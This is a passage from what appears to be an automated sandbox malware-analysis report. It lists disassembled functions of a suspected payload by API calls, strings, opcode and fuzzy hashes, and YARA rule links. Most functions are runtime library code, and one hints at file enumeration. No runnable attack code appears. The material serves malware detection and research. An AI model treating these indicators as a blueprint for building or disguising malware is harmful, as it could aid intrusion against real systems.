                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            • Opcode ID: d17bea3a9e72c22c1f192be28b65bc3e0ac5ead759d6f8e860dcdbb2e5314aad
                                                                                                                            • Instruction ID: a133d328db52ea1cae40b3c62092b56500976433536ad120df0f18bf4e73d337
                                                                                                                            • Opcode Fuzzy Hash: d17bea3a9e72c22c1f192be28b65bc3e0ac5ead759d6f8e860dcdbb2e5314aad
                                                                                                                            • Instruction Fuzzy Hash: AB5166715142455BC724FF62C992AEEB7A8FF54348F40C82EF44E43162EF78A609CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00483B64
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00483B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00483B97
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            • Opcode ID: 465b6f52f8ee14c436f5b4db58d91177a9e3058db15a5f4291d9481022911b71
                                                                                                                            • Instruction ID: 76720e5e7bc344fa612d069b29f5312166549de4e4287ed31daf6cda5f065efc
                                                                                                                            • Opcode Fuzzy Hash: 465b6f52f8ee14c436f5b4db58d91177a9e3058db15a5f4291d9481022911b71
                                                                                                                            • Instruction Fuzzy Hash: 70F0F47140421D66CF00BE99EC56DDE7BECEF01719F10497BFC1492282DBB4AA4483D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B4C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B4AE0: GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                              • Part of subcall function 004B4AE0: GetFileType.KERNEL32(00000000), ref: 004B4B05
                                                                                                                              • Part of subcall function 004B4AE0: __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                            • _raise.LIBCMT ref: 004B4C18
                                                                                                                              • Part of subcall function 0048A12E: __getptd_noexit.LIBCMT ref: 0048A16B
                                                                                                                              • Part of subcall function 00487CEC: _doexit.LIBCMT ref: 00487CF6
                                                                                                                            Strings
                                                                                                                            • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 004B4C0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                            • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                            • API String ID: 2149077303-4210838268
                                                                                                                            • Opcode ID: 6918172f6aa70a9c6c04f2eec9ca4ff520f23c9e8130120c2123fe9f764eca90
                                                                                                                            • Instruction ID: c5a3b9159c9b93735f416e65793988c04d626651bbc0383db7b81e79d80ece31
                                                                                                                            • Opcode Fuzzy Hash: 6918172f6aa70a9c6c04f2eec9ca4ff520f23c9e8130120c2123fe9f764eca90
                                                                                                                            • Instruction Fuzzy Hash: 9AD05E794882047FED013790DC07A0E7B51EF88718F408819F2AE000A2D6B6C120A71B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2799698630-0
                                                                                                                            • Opcode ID: c0f6fbd4d161bd1c7a07a62af20c18cc4a2147ad8314892ad882a40186538de1
                                                                                                                            • Instruction ID: 76bf15182a06890a2aebc7699a6fc384f61425c29c44d808be58a42648686797
                                                                                                                            • Opcode Fuzzy Hash: c0f6fbd4d161bd1c7a07a62af20c18cc4a2147ad8314892ad882a40186538de1
                                                                                                                            • Instruction Fuzzy Hash: D6519E70C00258DAEF20EB60DD457DFB7B5BF21318F0040AAD40E67251E77AAA89CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048FB7B
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(00000000,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0048FB8E
                                                                                                                              • Part of subcall function 0048FE47: __lock.LIBCMT ref: 0048FE6C
                                                                                                                              • Part of subcall function 0048FE47: ____lc_codepage_func.LIBCMT ref: 0048FEB3
                                                                                                                              • Part of subcall function 0048FE47: __getenv_helper_nolock.LIBCMT ref: 0048FED4
                                                                                                                              • Part of subcall function 0048FE47: _free.LIBCMT ref: 0048FF07
                                                                                                                              • Part of subcall function 0048FE47: _strlen.LIBCMT ref: 0048FF0E
                                                                                                                              • Part of subcall function 0048FE47: __malloc_crt.LIBCMT ref: 0048FF15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282695788-0
                                                                                                                            • Opcode ID: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction ID: 765a56c5f03115d4445ba7584c69f2dcc45a2302bb122a8e22139a8ae99c39fb
                                                                                                                            • Opcode Fuzzy Hash: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction Fuzzy Hash: 97E0E634551644DAD720BBB6E91A71C7160AB10329F50991FD414111D24FBC15CCEB2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00487B11
                                                                                                                              • Part of subcall function 00487AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00487B16,00000000,?,00488BCA,000000FF,0000001E,00567BD0,00000008,00488B0E,00000000,00000000), ref: 00487AE6
                                                                                                                              • Part of subcall function 00487AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00487AF8
                                                                                                                            • ExitProcess.KERNEL32 ref: 00487B1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2427264223-0
                                                                                                                            • Opcode ID: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction ID: fa7413996304f0347a65eb69a8b915408f0931ee0ea5a9b8ae6a68151094643b
                                                                                                                            • Opcode Fuzzy Hash: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction Fuzzy Hash: 74B09230004108BBCB093F52DC0A85D3F2AEF01390F108025F90408032EFB2AA92AAC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004718C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004718DD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004718E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHandleVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2443081362-0
                                                                                                                            • Opcode ID: 7363862000c422080f0dd162fc9100bcc2975a4de13f983199d5cbb3722a5228
                                                                                                                            • Instruction ID: 5f9d6ac8011b7df6ab4fcb4ab5ac74a61d14267af85432cbf749cf236a207151
                                                                                                                            • Opcode Fuzzy Hash: 7363862000c422080f0dd162fc9100bcc2975a4de13f983199d5cbb3722a5228
                                                                                                                            • Instruction Fuzzy Hash: C4E08636A01504DBC7209B9CEC8079DB374FB89B20F21436AD919733D147352D0A9985
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00476950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004769DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 120817956-0
                                                                                                                            • Opcode ID: 2c545b1fec7d90c27ff4b83ce1be4cc37c5c656f327c660adca26681e08ebe91
                                                                                                                            • Instruction ID: 078e5a2934cbd84971401e251856dd4db301e707a41f40566b42731f595d4079
                                                                                                                            • Opcode Fuzzy Hash: 2c545b1fec7d90c27ff4b83ce1be4cc37c5c656f327c660adca26681e08ebe91
                                                                                                                            • Instruction Fuzzy Hash: 5931C5B1A00A05DBCB20DF68C5816AFB7EAEB46710F21863FE459D7780DB389D058795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00476760 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004767E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 120817956-0
                                                                                                                            • Opcode ID: 31d879c7ebdae510f17fced3ce212282a483fdef10c601ee0fb3d78faba36a09
                                                                                                                            • Instruction ID: d7eda38beac837b9728e65bef200c8ea9207d9b7ef86cdfacd08b80cba1969bf
                                                                                                                            • Opcode Fuzzy Hash: 31d879c7ebdae510f17fced3ce212282a483fdef10c601ee0fb3d78faba36a09
                                                                                                                            • Instruction Fuzzy Hash: 713128B1901A019BDB28DF69C58079EBBF6EB40754F118B2EE42A977C0D7389D00C796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00476570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004765C5
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            • Opcode ID: 3069502f5adee82eb08b6b61a2aaae1e9f673bff5170eeb57c54545a6cb77e70
                                                                                                                            • Instruction ID: 8bbfcf1a8ea03a584bcd23449d83934eb7c01af2adfb3cbfd3853ffddb6da60b
                                                                                                                            • Opcode Fuzzy Hash: 3069502f5adee82eb08b6b61a2aaae1e9f673bff5170eeb57c54545a6cb77e70
                                                                                                                            • Instruction Fuzzy Hash: 462124B5900515DBCB14DF5CD981B9EBFA9EF45B00F04822AEC099B348D734EA14CBE5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472840 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00473C40: _memset.LIBCMT ref: 00473C83
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004728AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800726579-0
                                                                                                                            • Opcode ID: 2d4b8fab515abee23c3b3b54dad72ac7f6cab5fb7e69a022a1d0f1c8619874ec
                                                                                                                            • Instruction ID: 45bdd4d0a6163249c40b1e8436726196a7e474a24ed8e501d1627ff34af1ed3c
                                                                                                                            • Opcode Fuzzy Hash: 2d4b8fab515abee23c3b3b54dad72ac7f6cab5fb7e69a022a1d0f1c8619874ec
                                                                                                                            • Instruction Fuzzy Hash: 62110331900215BBDB11AF59CD45BDFBFA8EF02714F00422AF818672C0C7B999198BDA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047CC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0047CC83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
